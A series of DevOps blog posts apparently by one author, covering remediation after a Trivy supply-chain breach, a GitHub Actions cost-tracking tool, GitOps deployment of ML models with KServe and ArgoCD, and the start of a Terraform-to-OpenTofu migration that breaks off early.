Kubernetes service account tokens
Docker registry credentials
SSH keys
Database credentials
GitHub PATs and tokens

2. Pin actions to commit SHAs

This is the single most effective structural change. Tags are mutable. Commit SHAs are not.

# Bad — this is what everyone does, and what got compromised
- uses: aquasecurity/trivy-action@0.24.0

# Good — SHA-pinned, immutable
- uses: aquasecurity/trivy-action@57a97c7843d7da7a7b4f8ce2a0c4e3b7f0c2e1d  # 0.35.0

Yes, it's more work to update. That's the point. Renovatebot or Dependabot can automate SHA updates if you configure them for Actions.

3. Switch to OIDC for cloud authentication

Long-lived cloud credentials in CI are a liability. OIDC lets your runner authenticate to AWS, GCP, or Azure without storing static keys:

# AWS example
- uses: aws-actions/configure-aws-credentials@v4
  with:
    role-to-assume: arn:aws:iam::ACCOUNT:role/github-actions-role
    aws-region: us-east-1

Nothing to steal if there's nothing stored. The credentials are ephemeral and scoped to the job.

4. Restrict runner permissions

GitHub Actions runners get GITHUB_TOKEN by default. Scope it down:

permissions:
  contents: read
  security-events: write
  # Nothing else

Most workflows need far less than the default. Less permission means smaller blast radius.

5. Audit non-human identities

The Trivy attack persisted because one service account credential wasn't rotated. Audit all machine identities in your org:

GitHub PATs: Who issued them? When do they expire? Are they scoped minimally?
Service accounts: Which ones have write access to release infrastructure?
Bot accounts: Are any shared across orgs or repositories?

Long-lived, over-privileged service accounts are how a one-time breach becomes a three-week campaign.

6. Use secret scanning

GitGuardian, GitHub's native secret scanning, or both. The Trivy attacker used GitHub as a fallback exfiltration channel. If your credentials ever end up in a public repo, you want to know in minutes, not days.

7. Verify binaries before running them

For direct binary downloads (not GitHub Actions), verify checksums:

# Download the official checksums
curl -sSL https://github.com/aquasecurity/trivy/releases/download/v0.69.3/trivy_0.69.3_checksums.txt -o checksums.txt

# Verify your binary
sha256sum -c checksums.txt --ignore-missing

If your pipeline downloads and runs binaries from the internet, add checksum verification as a step.

The Real Lesson

The Trivy attack was technically sophisticated, but the root cause is unglamorous: incomplete credential rotation.

Aqua disclosed the initial breach on March 1 and rotated credentials. One PAT, one service account, one residual access path was left active. That's what TeamPCP used on March 19. The March 22 Docker Hub compromise used yet another separate credential that wasn't in scope of the original remediation.

When you rotate secrets after a breach, you need to be exhaustive. Enumerate every credential that could have been exposed, every service account that had access, every integration that used a compromised token. Rotation is not a task you do until it feels complete. It's a task you do until you've verified every access path is severed.

The other lesson: the attack surface for CI/CD is enormous. Your pipeline runs with access to secrets, cloud credentials, internal infrastructure. When you add a third-party action, you're trusting that maintainer's entire security posture, including their CI, their service accounts, and their credential management practices. SHA pinning doesn't eliminate that trust but it gives you a stable, auditable point you can reason about.

Immediate Checklist

[ ] Check pipeline logs for trivy-action usage between March 19–20
[ ] Check pipeline logs for trivy binary v0.69.4 usage on March 19
[ ] Check for Docker image usage of v0.69.5, v0.69.6, or latest between Mar 22–24
[ ] Rotate all secrets accessible from affected runners
[ ] Update trivy-action to v0.35.0 or pin to SHA
[ ] Check for LiteLLM usage of 1.82.7 or 1.82.8
[ ] Switch cloud auth to OIDC
[ ] Pin all third-party actions to commit SHAs
[ ] Restrict workflow permissions to minimum required
[ ] Audit service accounts and PATs for expiry and scope
[ ] Enable secret scanning on your org

References:

GitHub Actions costs are leaking, and most teams don't notice until it's too late

Mateen Anjum — Mon, 16 Mar 2026 05:24:12 +0000

Two years ago I was working on a connected vehicles platform running 40+ microservices on Kubernetes. CI was healthy, tests were passing, and nobody was paying attention to the GitHub Actions bill until it hit $4,200 in a single month.

The culprit was a matrix build that someone had extended to cover six Node versions. Nobody noticed because the cost didn't show up anywhere obvious. It wasn't flagged in any alert. The engineers who added the matrix jobs weren't thinking about cost. By the time finance asked the question, the pattern had been running for three months.

I started looking for a tool that could give us per-workflow cost visibility. Something that would let us answer "which workflows cost the most" and "did this PR make CI more expensive." I didn't find anything that fit, so I built CICosts.

What it does

CICosts installs as a GitHub App and receives a webhook event every time a workflow run completes. It multiplies the runner minutes by GitHub's published pricing for that runner type (Linux, Windows, macOS, self-hosted) and stores the result.

From there you get a dashboard showing cost by workflow, by repository, by branch, and over time. You can set alerts when a workflow exceeds a threshold. You can see trends, spot regressions after PRs merge, and compare costs across environments.

The math is straightforward. GitHub charges $0.008/minute for Linux runners, $0.016 for Windows, $0.08 for macOS. If a workflow runs for 12 minutes on Linux, that's $0.096. Not much in isolation. Run it 500 times a day across 30 repositories and it adds up fast.

The common patterns I see

After watching enough CI pipelines, a few patterns account for most of the waste:

Matrix explosions. A workflow that tests across 3 OS versions and 4 runtime versions runs 12 times per push. If the matrix was added incrementally over time, nobody may have thought through the cumulative cost.

macOS runners for non-macOS work. macOS runners cost 10x more than Linux. They're necessary for iOS builds and sometimes for Homebrew. They're not necessary for most backend services, but they show up there sometimes because someone copied a workflow template.

Test parallelism without caching. Running tests in parallel is good. Running them in parallel while re-downloading 200MB of dependencies on every run because the cache key is wrong is expensive.

Nightly builds that nobody needs. Workflows scheduled to run nightly that were set up to catch a specific class of bug that was fixed 18 months ago. The schedule never got cleaned up.

None of these are difficult to fix once you can see them. The problem is visibility.

Why it's now open source and free

I built this as a paid SaaS originally. The pricing was too restrictive for a product without an established reputation. If you're asking engineers to add a GitHub App to their organization and trust it with their CI data, "trust us, it's $29/month" is a hard sell when nobody's heard of you.

The honest version: the product was good and nobody knew about it. That's a distribution problem, not a product problem.

So the model is now simple. CICosts is MIT licensed, the code is on GitHub, and the hosted version at app.cicosts.dev is free with no usage limits. If your organization needs an SLA or wants a private deployment, that's the enterprise tier.

Getting started

Install it from GitHub:

https://github.com/phonotechnologies/cicosts-app
https://github.com/phonotechnologies/cicosts-api

Or use the hosted version directly at app.cicosts.dev. Add the GitHub App to your organization, and cost data starts flowing within a few minutes of your next workflow run.

The setup takes about five minutes. There's no code change required in your repos. The GitHub App receives webhook events automatically once installed.

What I'd do differently

If I were starting from zero, I'd make it open source from day one and focus entirely on getting the GitHub App installation experience right. The hardest part of a tool like this isn't the cost calculation. It's getting someone to trust it enough to install it.

Open source makes that easier. You can read the code. You can see exactly what data is being stored and what isn't. That matters when you're asking someone to add an app to their GitHub organization.

The code is on GitHub under the phonotechnologies organization. PRs welcome, especially around runner pricing updates and new alert types. If you run into something, open an issue.

GitOps for ML in 2026: Treat Your AI Models Like Microservices (Or Watch Them Drift Into Production Chaos)

Mateen Anjum — Sat, 14 Mar 2026 21:46:50 +0000

TL;DR: Apply the same GitOps discipline you use for application code to ML model deployments, and you get version history, rollback, and promotion gates that actually work, instead of the SSH-and-pray workflow most teams are still running.

The Problem

There's a model running in production right now that nobody on your team can explain. It was trained six weeks ago, deployed by someone who's since moved to a different team, and the only record of what version it is lives in a Slack message that's been buried under 4,000 other messages.

When it starts making bad predictions, what's your rollback plan? If your answer involves SSHing into a server, editing a config file by hand, and hoping the right weights get loaded, you're in the majority. That doesn't make it less of a disaster.

I spent the better part of last year helping platform teams get their ML deployment story straight. The pattern I kept seeing: teams had decent model training pipelines, reasonable experiment tracking in MLflow, and then a complete gap between "model registered" and "model serving traffic." The gap got filled with shell scripts, manual steps, and a whole lot of tribal knowledge.

The fix isn't a new tool. It's applying discipline you already have from application deployments to the model deployment layer.

Before we moved to GitOps for model deployments, a typical promotion cycle looked like this. A data scientist trains a new version, registers it in MLflow, then files a ticket. A platform engineer picks up the ticket, SSH-es into the model server, updates the model path, restarts the serving process, and manually validates that predictions look reasonable. Start to finish: 4 to 6 hours on a good day, longer when the engineer is in meetings or the server is being weird.

Rollback? There was no rollback. The best-case scenario was that someone remembered what the previous model path was.

What Most Teams Try First (And Why It Fails)

The first instinct is usually scripts. Someone writes a deploy.sh that takes a model version as an argument, connects to the serving infrastructure, and handles the update. This is better than pure manual steps, but it fails in a few predictable ways.

First, scripts don't have memory. You can run deploy.sh with model version 47, then run it again with version 51, and there's no audit trail of who ran what or why. When something goes wrong, you're back to grep-ing through logs and asking around.

Second, scripts don't handle promotion gates. You can't encode "this model can only go to production if it passed staging validation for 24 hours" in a shell script without it becoming a sprawling mess that nobody wants to maintain.

Third, and this one bites hardest: scripts assume the current state. If someone manually changes something on the serving infrastructure, your script has no way of detecting that drift. The next run might succeed or fail unpredictably depending on what changed and when.

MLflow solves the experiment tracking and model registry side well. You get version numbers, artifact storage in S3, stage transitions (Staging, Production), and a clean API. What MLflow doesn't give you is a Kubernetes-native way to declare "this cluster should be running model version 47 right now" and enforce that continuously.

That's where KServe and ArgoCD come in.

The Architecture

The full stack has five layers working together.

MLflow + S3 handle model artifacts. Every trained model version gets registered with MLflow, which stores the artifact URI pointing to a path in S3. The URI looks something like s3://ml-models-prod/fraud-detector/v47/model.pkl. MLflow's registry gives you a version number and stage metadata. The actual weights live in S3.

KServe InferenceService is the Kubernetes abstraction for serving. Instead of managing a Pod or Deployment by hand, you define an InferenceService custom resource that describes what model to load, from where, and how to scale. KServe handles the rest: downloading the artifact from S3, loading it into the serving framework (Triton, TorchServe, SKLearn Server), and exposing an HTTP endpoint.

Git holds the desired state. A values.yaml file in your repository specifies which model version each environment should run. Promoting from staging to production is a PR that bumps a version number. The PR is the change review, the approval gate, and the audit trail all at once.

ArgoCD reconciles the cluster to match what's in Git. When the PR merges, ArgoCD detects the change and applies the updated KServe InferenceService. If someone manually changes the InferenceService on the cluster, ArgoCD detects the drift and reverts it.

Istio manages traffic splitting. During canary promotion, a VirtualService routes 10% of traffic to the new model version while 90% continues to the stable version. If metrics look good after a soak period, you update the weights and do a full cutover.

Prometheus collects serving metrics. Latency (p99 in particular), throughput, and prediction distribution histograms give you the signals needed to decide whether a canary is healthy or needs to be rolled back.

The Workflow

Here's how a model promotion actually works end to end.

A data scientist trains a new model, evaluates it against the validation set, and if it passes threshold, registers it in MLflow:

import mlflow

with mlflow.start_run():
    mlflow.sklearn.log_model(model, "model")
    mlflow.log_metrics({"f1_score": 0.94, "auc": 0.97})
    run_id = mlflow.active_run().info.run_id

client = mlflow.tracking.MlflowClient()
model_uri = f"runs:/{run_id}/model"
mv = client.create_model_version("fraud-detector", model_uri, run_id)
# mv.version == "47"

That registration triggers a CI pipeline (GitHub Actions or Tekton, depending on your setup) that opens a pull request bumping the version in the dev environment's values file.

values.yaml structure:

environments:
  dev:
    model:
      name: fraud-detector
      version: "47"
      storageUri: "s3://ml-models-prod/fraud-detector/v47"
      resources:
        requests:
          cpu: "2"
          memory: "4Gi"
        limits:
          cpu: "4"
          memory: "8Gi"
      minReplicas: 1
      maxReplicas: 3

  staging:
    model:
      name: fraud-detector
      version: "45"
      storageUri: "s3://ml-models-prod/fraud-detector/v45"
      resources:
        requests:
          cpu: "2"
          memory: "4Gi"
        limits:
          cpu: "4"
          memory: "8Gi"
      minReplicas: 2
      maxReplicas: 5

  prod:
    model:
      name: fraud-detector
      version: "43"
      storageUri: "s3://ml-models-prod/fraud-detector/v43"
      resources:
        requests:
          cpu: "4"
          memory: "8Gi"
        limits:
          cpu: "8"
          memory: "16Gi"
      minReplicas: 5
      maxReplicas: 20

KServe InferenceService (stable):

apiVersion: serving.kserve.io/v1beta1
kind: InferenceService
metadata:
  name: fraud-detector
  namespace: ml-serving-prod
  annotations:
    argocd.argoproj.io/sync-wave: "1"
spec:
  predictor:
    serviceAccountName: kserve-s3-sa
    sklearn:
      storageUri: "s3://ml-models-prod/fraud-detector/v43"
      resources:
        requests:
          cpu: "4"
          memory: "8Gi"
        limits:
          cpu: "8"
          memory: "16Gi"
    minReplicas: 5
    maxReplicas: 20
    scaleTarget: 80
    scaleMetric: concurrency

KServe InferenceService (canary variant):

apiVersion: serving.kserve.io/v1beta1
kind: InferenceService
metadata:
  name: fraud-detector
  namespace: ml-serving-prod
  annotations:
    argocd.argoproj.io/sync-wave: "1"
spec:
  predictor:
    serviceAccountName: kserve-s3-sa
    sklearn:
      storageUri: "s3://ml-models-prod/fraud-detector/v47"
      resources:
        requests:
          cpu: "4"
          memory: "8Gi"
        limits:
          cpu: "8"
          memory: "16Gi"
    minReplicas: 1
    maxReplicas: 5
    canaryTrafficPercent: 10

ArgoCD ApplicationSet for multi-environment management:

apiVersion: argoproj.io/v1alpha1
kind: ApplicationSet
metadata:
  name: fraud-detector-serving
  namespace: argocd
spec:
  generators:
    - list:
        elements:
          - env: dev
            cluster: dev-cluster
            namespace: ml-serving-dev
          - env: staging
            cluster: staging-cluster
            namespace: ml-serving-staging
          - env: prod
            cluster: prod-cluster
            namespace: ml-serving-prod
  template:
    metadata:
      name: "fraud-detector-{{env}}"
    spec:
      project: ml-serving
      source:
        repoURL: https://github.com/org/ml-gitops
        targetRevision: HEAD
        path: "environments/{{env}}"
        helm:
          valueFiles:
            - values.yaml
      destination:
        server: "{{cluster}}"
        namespace: "{{namespace}}"
      syncPolicy:
        automated:
          prune: true
          selfHeal: true
        syncOptions:
          - CreateNamespace=true
          - RespectIgnoreDifferences=true

Istio VirtualService for canary traffic split:

apiVersion: networking.istio.io/v1beta1
kind: VirtualService
metadata:
  name: fraud-detector-vs
  namespace: ml-serving-prod
spec:
  hosts:
    - fraud-detector.ml-serving-prod.svc.cluster.local
  http:
    - match:
        - headers:
            x-canary:
              exact: "true"
      route:
        - destination:
            host: fraud-detector-predictor-canary
            port:
              number: 80
          weight: 100
    - route:
        - destination:
            host: fraud-detector-predictor-default
            port:
              number: 80
          weight: 90
        - destination:
            host: fraud-detector-predictor-canary
            port:
              number: 80
          weight: 10

After the PR merges to dev, ArgoCD picks up the change within 3 minutes (the default sync interval) and applies the updated InferenceService. The model downloads from S3, the serving pod comes up, and the endpoint starts responding. At this point you can run your automated evaluation suite against the dev endpoint.

Promoting to staging is another PR. A human reviews it, checks the dev evaluation results, and approves. Merge, ArgoCD syncs, done. Production promotion follows the same pattern but includes an additional step: the canary InferenceService gets deployed first with 10% traffic, and a GitHub Actions workflow monitors Prometheus metrics for a configured soak period (we use 2 hours for most models) before opening the full-cutover PR automatically.

Drift Detection

Prediction drift is the sneaky failure mode. The model is technically serving, latency looks fine, but the distribution of predictions has shifted because the input data changed. You won't catch this with a liveness probe.

KServe's sklearn server exposes prediction histograms as Prometheus metrics out of the box. You define alerting rules that fire when the distribution deviates beyond a threshold from the baseline captured at deployment time.

Prometheus PrometheusRule for drift alerting:

apiVersion: monitoring.coreos.com/v1
kind: PrometheusRule
metadata:
  name: fraud-detector-drift
  namespace: ml-serving-prod
  labels:
    prometheus: kube-prometheus
    role: alert-rules
spec:
  groups:
    - name: fraud-detector.drift
      interval: 2m
      rules:
        - alert: PredictionDriftDetected
          expr: |
            abs(
              avg_over_time(fraud_detector_prediction_mean[10m])
              - avg_over_time(fraud_detector_prediction_mean[60m] offset 1d)
            ) > 0.15
          for: 10m
          labels:
            severity: warning
            model: fraud-detector
            env: prod
          annotations:
            summary: "Prediction distribution shift detected for fraud-detector"
            description: "Mean prediction shifted by {{ $value | humanizePercentage }} from yesterday's baseline. Check for input data schema changes."

        - alert: ModelLatencyHigh
          expr: |
            histogram_quantile(0.99,
              sum(rate(fraud_detector_request_duration_seconds_bucket[5m])) by (le)
            ) > 0.5
          for: 5m
          labels:
            severity: critical
            model: fraud-detector
            env: prod
          annotations:
            summary: "p99 latency above 500ms for fraud-detector"
            description: "p99 latency is {{ $value }}s. SLA threshold is 500ms."

        - alert: ModelErrorRateHigh
          expr: |
            rate(fraud_detector_request_total{status_code=~"5.."}[5m])
            /
            rate(fraud_detector_request_total[5m]) > 0.01
          for: 5m
          labels:
            severity: critical
            model: fraud-detector
            env: prod
          annotations:
            summary: "Error rate above 1% for fraud-detector"

When this alert fires, it sends to PagerDuty (or your alert routing of choice via AlertManager). The on-call engineer's first action is to check whether a canary is active. If it is, rolling back is a single command:

git revert HEAD~1
git push origin main

ArgoCD detects the revert within 3 minutes and redeploys the previous InferenceService version. In practice, our rollbacks averaged 4 minutes from decision to stable serving.

Results

Metric	Before	After
Time to deploy new model version	4 to 6 hours	8 minutes to production canary
Rollback capability	None (manual rebuild)	`git revert`, avg 4 minutes
Drift detection time	6 hours (user reports)	15 minutes (automated alert)
Deployment audit trail	Slack messages	Full Git history with PR reviews
Environment parity	Best effort	Enforced via ApplicationSet
Config drift prevention	None	ArgoCD selfHeal

The number that surprised me most was the drift detection improvement. We caught a data schema change within 15 minutes on the new system. The same type of change previously went undetected for 6 hours before a user complaint surfaced it. That's not a monitoring win, it's a business outcome.

Lessons Learned

Start with the values.yaml contract. The shape of that file is the most important design decision you'll make. Get the team to agree on it before writing any ArgoCD config. Everything else follows from it.

S3 artifact URIs in the InferenceService spec, not model names. MLflow stage names ("Production", "Staging") are mutable. If you reference a stage name in your InferenceService spec, two different model versions could map to the same stage name over time, and your Git history loses meaning. Reference the explicit S3 URI with the version number baked in.

selfHeal is non-negotiable. Turn it on in your ArgoCD sync policy. Without selfHeal, a manual kubectl edit on the InferenceService will drift silently and nobody will notice until it matters.

Canary soak time depends on your traffic volume. For a high-volume fraud model processing 50k requests per minute, 30 minutes of canary is enough to get statistically significant signal. For a low-volume model processing 100 requests per day, 2 hours of canary at 10% gives you 20 requests through the new version. Adjust accordingly, or route specific customers to the canary instead of random percentage splitting.

Model cold start affects canary rollouts. Large models take time to download from S3 and load into memory. A 2GB model on a cold node might take 3 to 4 minutes before it's ready to serve. Account for this in your readiness probe timeouts and don't let your monitoring system flag the canary as failing during the startup window.

Try It Yourself

The repository structure I've described looks like this:

ml-gitops/
├── environments/
│   ├── dev/
│   │   ├── values.yaml
│   │   └── templates/
│   │       ├── inference-service.yaml
│   │       └── virtual-service.yaml
│   ├── staging/
│   │   ├── values.yaml
│   │   └── templates/
│   └── prod/
│       ├── values.yaml
│       └── templates/
├── base/
│   ├── inference-service-template.yaml
│   └── prometheus-rules.yaml
└── applicationset.yaml

Prerequisites before you start:

Kubernetes cluster (1.28 or newer)
KServe 0.12 or newer installed
ArgoCD 2.9 or newer installed
Istio 1.20 or newer installed
MLflow tracking server accessible from the cluster
S3 bucket with appropriate IRSA or Workload Identity configured for KServe pods

The ArgoCD ApplicationSet in this post assumes a Helm-based templating approach where each environment folder contains a values.yaml and a templates directory with the InferenceService and VirtualService manifests. You could also use Kustomize overlays. The concepts are identical.

Start with dev only. Get one model version deploying cleanly through ArgoCD before adding staging and prod. Add the canary workflow only after the basic promotion gate is working reliably.

The jump from "it works in dev" to "it's reliable in prod" is mostly about the Prometheus alerting and the canary soak automation. Those two pieces are what make the system trustworthy enough for the team to stop second-guessing every deployment.

Resources:

GitOps for ML Model Deployment: A Real Pipeline, Not a Toy Demo

Mateen Anjum — Sun, 08 Mar 2026 06:27:15 +0000

TL;DR: I replaced ad-hoc model deployments with a fully declarative GitOps pipeline using KServe and ArgoCD. Every model version lives in Git, every change goes through a PR, and rollbacks take one git revert.

The Problem

Every ML team I've worked with has the same dirty secret: their model deployments are snowflakes.

The Python script that "works on the data scientist's machine." The Slack message that says "hey can you deploy the new model." The SSH session into the GPU node that nobody documented. Meanwhile, the same team's microservices are humming along with ArgoCD, automated rollbacks, PR-gated deploys, full audit trails.

That gap is embarrassing, and it's completely unnecessary.

KServe got accepted into CNCF as an Incubating project in September 2025. The tooling to close this gap is mature enough for production. Here's what the actual problem looks like in practice:

Someone manually SSHes into a node and runs a deployment script. No record of what version went live.
A model update silently replaces the previous one. There's no rollback path.
Two data scientists think different model versions are running in staging. Both are right, sort of.
An incident happens. Nobody can tell what changed or when.

I've lived through all of these. The fix isn't a better runbook or more Slack discipline. It's treating model deployments the same way we treat application deployments.

What I Tried First (And Why It Failed)

Attempt 1: Wrapping deployments in shell scripts

The first instinct was to write a deploy_model.sh that calls kubectl apply with the right image tag. This is better than nothing, but it's not GitOps. The script lives somewhere, gets edited ad-hoc, and there's still no PR-gated workflow. The script is the new snowflake.

Attempt 2: Baking models into Docker images

The idea: train the model, package the weights into a Docker image, deploy the image via a normal Deployment. This works surprisingly well for small models under a few hundred MB. It breaks down fast when the model is 2GB or 14GB. Your Docker build times blow up, your registry costs climb, and now your CI pipeline is bottlenecked on model artifact size.

More importantly, you lose the semantic layer. Your Git history shows model:sha256-abc123 instead of fraud-detector/v2.5.0 sklearn 2 replicas 50 RPS target. The config and the artifact are fused. That's hard to review and harder to reason about.

Attempt 3: What actually worked

Separate the artifact from the config. The model weights live in S3, content-addressed and immutable. Git holds the pointer and all the serving configuration. A Kubernetes controller keeps the cluster in sync with what Git says. That's it.

The Solution

The stack I use and recommend:

Layer	Tool	Why
Model serving	KServe v0.14+	Kubernetes-native CRD, multi-framework, built-in canary
GitOps controller	ArgoCD	Declarative sync, health checks, rollback
Model storage	S3	Content-addressable, versioned, immutable
Model versioning	MLflow	Tracks lineage from training to deployment
Ingress	Istio	Traffic splitting for canary rollouts
Secrets	AWS IRSA	No credentials in Git, ever

KServe is the linchpin. It exposes a single InferenceService CRD that ArgoCD manages like any other Kubernetes resource.

Step 1: Install KServe

# cert-manager is a prerequisite
kubectl apply -f https://github.com/cert-manager/cert-manager/releases/download/v1.17.0/cert-manager.yaml

kubectl create ns kserve

helm install kserve-crd oci://ghcr.io/kserve/charts/kserve-crd \
  --version v0.14.1 \
  --namespace kserve

helm install kserve oci://ghcr.io/kserve/charts/kserve \
  --version v0.14.1 \
  --namespace kserve \
  --set kserve.controller.deploymentMode=RawDeployment

I use RawDeployment mode. It uses standard Kubernetes Deployments and Services instead of Knative, which means fewer moving parts, better compatibility with existing Prometheus and HPA setups, and no cold-start complexity on the critical path.

Step 2: Structure your Git repo

models/
├── base/
│   └── kustomization.yaml
├── fraud-detector/
│   ├── kustomization.yaml
│   ├── inference-service.yaml
│   └── service-account.yaml
├── image-classifier/
│   ├── kustomization.yaml
│   └── inference-service.yaml
└── overlays/
    ├── staging/
    │   └── kustomization.yaml
    └── production/
        └── kustomization.yaml

Kustomize overlays let you parameterize resource limits, replica counts, and model URIs per environment without duplicating YAML.

Step 3: Define the InferenceService

This is the core resource. Here's a real example for a scikit-learn fraud detection model stored in S3:

# models/fraud-detector/inference-service.yaml
apiVersion: serving.kserve.io/v1beta1
kind: InferenceService
metadata:
  name: fraud-detector
  namespace: ml-serving
  labels:
    app: fraud-detector
    team: ml-platform
    model-version: "2.4.1"
  annotations:
    serving.kserve.io/deploymentMode: RawDeployment
spec:
  predictor:
    minReplicas: 2
    maxReplicas: 10
    scaleTarget: 50
    scaleMetric: rps
    serviceAccountName: kserve-s3-sa
    model:
      modelFormat:
        name: sklearn
      storageUri: "s3://prod-ml-models/fraud-detector/v2.4.1"
      resources:
        requests:
          cpu: "500m"
          memory: "1Gi"
        limits:
          cpu: "2"
          memory: "4Gi"
      env:
        - name: SKLEARN_SERVER_WORKERS
          value: "2"

The storageUri is the version pointer. Bumping v2.4.1 to v2.5.0 and raising a PR is your deploy-new-model workflow.

For GPU workloads:

# models/image-classifier/inference-service.yaml
apiVersion: serving.kserve.io/v1beta1
kind: InferenceService
metadata:
  name: image-classifier
  namespace: ml-serving
  labels:
    model-version: "1.3.0"
spec:
  predictor:
    minReplicas: 1
    maxReplicas: 4
    serviceAccountName: kserve-s3-sa
    model:
      modelFormat:
        name: pytorch
      storageUri: "s3://prod-ml-models/image-classifier/v1.3.0"
      runtimeVersion: "23.08-py3"
      resources:
        requests:
          cpu: "2"
          memory: "8Gi"
          nvidia.com/gpu: "1"
        limits:
          cpu: "4"
          memory: "16Gi"
          nvidia.com/gpu: "1"
      nodeSelector:
        accelerator: nvidia-a10g

Step 4: Wire up the S3 service account

Don't put AWS credentials in manifests. Use IRSA on EKS:

# models/fraud-detector/service-account.yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: kserve-s3-sa
  namespace: ml-serving
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/kserve-model-reader

The IAM role needs s3:GetObject and s3:ListBucket on your model bucket. KServe's storage initializer picks up the IRSA token automatically.

Step 5: Create the ArgoCD Application

# argocd/apps/ml-models.yaml
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: ml-models
  namespace: argocd
  finalizers:
    - resources-finalizer.argocd.argoproj.io
spec:
  project: ml-platform
  source:
    repoURL: https://github.com/phonotech/ml-manifests
    targetRevision: main
    path: models/overlays/production
  destination:
    server: https://kubernetes.default.svc
    namespace: ml-serving
  syncPolicy:
    automated:
      prune: true
      selfHeal: true
    syncOptions:
      - CreateNamespace=true
      - RespectIgnoreDifferences=true
    retry:
      limit: 5
      backoff:
        duration: 5s
        factor: 2
        maxDuration: 3m
  ignoreDifferences:
    - group: serving.kserve.io
      kind: InferenceService
      jsonPointers:
        - /status
        - /metadata/annotations/serving.kserve.io~1deploymentMode

The ignoreDifferences block is critical. KServe's controller writes back to the InferenceService status and some annotations. Without it, ArgoCD will perpetually detect drift and attempt to re-sync, creating a noisy feedback loop.

Step 6: The deployment workflow

Here's what a model update looks like end to end:

Data scientist trains a new model, registers the artifact in MLflow, uploads weights to s3://prod-ml-models/fraud-detector/v2.5.0/
They open a PR updating storageUri and the model-version label in inference-service.yaml
PR gets reviewed and merged to main
ArgoCD detects the diff within 3 minutes (or immediately with webhooks), syncs the new InferenceService spec
KServe's storage initializer pulls the new weights into the pod
New revision comes up healthy, traffic cuts over

The model version is in Git history. You can git revert it. You can see exactly what changed between v2.4.1 and v2.5.0 in the PR diff.

To trigger ArgoCD immediately via webhook from GitHub Actions:

# .github/workflows/sync-models.yaml
name: Notify ArgoCD on model manifest change
on:
  push:
    branches: [main]
    paths:
      - 'models/**'

jobs:
  sync:
    runs-on: ubuntu-latest
    steps:
      - name: Trigger ArgoCD sync
        run: |
          curl -s -X POST \
            -H "Authorization: Bearer ${{ secrets.ARGOCD_TOKEN }}" \
            https://argocd.internal.ca/api/v1/applications/ml-models/sync

Canary rollouts

KServe's built-in canary support is where this pattern earns its keep.

# Step 1: Deploy canary at 10% traffic
apiVersion: serving.kserve.io/v1beta1
kind: InferenceService
metadata:
  name: fraud-detector
  namespace: ml-serving
spec:
  predictor:
    canaryTrafficPercent: 10
    model:
      modelFormat:
        name: sklearn
      storageUri: "s3://prod-ml-models/fraud-detector/v2.5.0"
      resources:
        requests:
          cpu: "500m"
          memory: "1Gi"

KServe automatically routes 90% to the last stable revision and 10% to v2.5.0. If the new model performs well, merge another PR bumping canaryTrafficPercent to 50, then promote to 100 by removing the field. If the canary is bad, set canaryTrafficPercent: 0 to pin back to stable immediately.

In RawDeployment mode, you handle canary at the Istio level:

# istio/virtualservice-fraud-detector.yaml
apiVersion: networking.istio.io/v1beta1
kind: VirtualService
metadata:
  name: fraud-detector
  namespace: ml-serving
spec:
  hosts:
    - fraud-detector.ml-serving.svc.cluster.local
  http:
    - route:
        - destination:
            host: fraud-detector-v2-4-1-predictor
            port:
              number: 8080
          weight: 90
        - destination:
            host: fraud-detector-v2-5-0-predictor
            port:
              number: 8080
          weight: 10

Both the InferenceService and the VirtualService are in Git. The traffic split is in Git. Everything is auditable and revertible.

Results

I won't pretend I have clean before/after numbers from a single project because this pattern spans multiple engagements. Here's what consistently holds:

Metric	Before	After
Model deployment method	Manual SSH or ad-hoc scripts	PR-gated, Git-backed
Audit trail	None or Slack history	Full Git history
Rollback time	30 minutes to hours	One `git revert`, seconds
Canary traffic split	Not possible without Istio knowledge	Config field in YAML
Time to detect config drift	Never (no baseline)	Continuous, ArgoCD UI
Secret management	Often hard-coded or in `.env` files	IRSA, no credentials in Git

The operational improvement that surprises people most: the on-call burden drops significantly when you can answer "what version is running, what changed, who approved it" in under 30 seconds by looking at Git.

Lessons Learned

1. The ignoreDifferences config is not optional. Skip it and you'll spend a weekend wondering why ArgoCD is perpetually out of sync when nothing real has changed. KServe mutates its own resources. Tell ArgoCD which fields to ignore.

2. Model size determines your storage strategy. Under 500MB, the default S3 init container approach is fine. Over a few GB, you need a shared model cache PVC or a pre-baked image. Planning this up front saves a painful migration later.

3. Always set nodeSelector for GPU workloads. Without it, your InferenceService might land on a CPU node and silently fall back to CPU inference. Set the affinity, set the tolerations, pin it.

4. Start with RawDeployment mode. Knative is powerful but it adds complexity. Get the core pattern working first, then add Knative if you genuinely need scale-to-zero economics.

5. GitOps creates friction on purpose. The PR workflow adds a step that direct kubectl apply doesn't. That step is the point. If your team resents the friction, they haven't lived through the 2am incident where nobody knows what changed.

Try It Yourself

The five things you actually need to get started:

KServe installed (Helm, RawDeployment mode, cert-manager prerequisite)
A models-manifests repo with InferenceService YAML per model, Kustomize overlays for environments
ArgoCD Application pointing at overlays/production, selfHeal: true, with ignoreDifferences on KServe status fields
IRSA or Workload Identity for S3 access
Branch protection on main so model version bumps require PR review

The canary rollout and GitHub Actions webhook are enhancements. Get the core working first.

I Migrated a Real Production Codebase from Terraform to OpenTofu (Here's What Broke)

Mateen Anjum — Sun, 08 Mar 2026 06:25:03 +0000

TL;DR: Migrating a standard AWS Terraform codebase to OpenTofu took half a day, most of which was CI pipeline updates. The S3 native locking alone made it worth it.

The Problem

I've been writing Terraform since version 0.8. Watched it grow from a scrappy infrastructure tool into the de-facto standard for cloud automation. I've migrated teams from CloudFormation to Terraform, written custom providers, debugged state corruption at 2 AM. Terraform is baked into how I think about infrastructure.

So when HashiCorp switched to the Business Source License in August 2023, I did what most practitioners did: I shrugged, bookmarked the OpenTofu repo, and went back to building.

That bookmark sat there for two years.

The BSL doesn't prevent you from using Terraform. It prevents you from building a product or service that's "substantially similar" to Terraform Cloud or Terraform Enterprise. For most teams running internal infrastructure, the risk is low. But once you're building a platform team that exposes self-service infrastructure to internal customers, or packaging IaC automation as part of a managed service, your legal team might want a conversation. And once "get legal sign-off on our IaC toolchain" is on the agenda, you've already lost an afternoon you'll never get back.

For a Phono Technologies project, we were building a lightweight CI/CD orchestration layer for client infrastructure. The moment I tried to describe it, I realized I was describing exactly what the BSL restricts. The ambiguity was real enough that I wanted it gone.

What I Tried First (And Why It Failed)

My first instinct was to just drop in the tofu binary and run tofu init. Simple enough.

